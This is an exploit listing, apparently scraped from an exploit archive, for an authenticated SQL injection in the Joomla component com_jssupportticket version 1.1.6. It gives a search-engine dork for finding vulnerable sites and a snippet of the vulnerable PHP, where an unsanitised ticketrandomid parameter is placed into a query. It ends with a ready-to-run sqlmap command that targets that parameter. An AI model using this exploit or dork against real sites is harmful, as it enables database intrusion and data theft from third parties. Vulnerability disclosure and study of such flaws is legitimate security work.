扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection #Dork: inurl:"index.php?option=com_jssupportticket" #Date: 10.08.19 #Exploit Author: qw3rTyTy #Vendor Homepage: https://www.joomsky.com/ #Software Link: https://www.joomsky.com/46/download/1.html #Version: 1.1.6 #Tested on: Debian/nginx/joomla 3.9.0 ##################################### #Vulnerability details: ##################################### Vulnerable code is in line 31 in file admin/models/ticketreply.php ...snip... 24 function storeTicketReplies($ticketid, $message, $created, $data2) { 25 if (!is_numeric($ticketid)) 26 return false; 27 28 //validate reply for break down 29 $ticketrandomid = $data2['ticketrandomid']; //!!! 30 $db = $this->getDBo(); 31 $query = "SELECT id FROM <code>#__js_ticket_tickets</code> WHERE ticketid='$ticketrandomid'"; //!!! 32 $db->setQuery($query); 33 $res = $db->loadResult(); 34 if($res != $ticketid){ 35 return false; 36 }//end ...snip... ##################################### #PoC: ##################################### $> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID' |
体验盒子
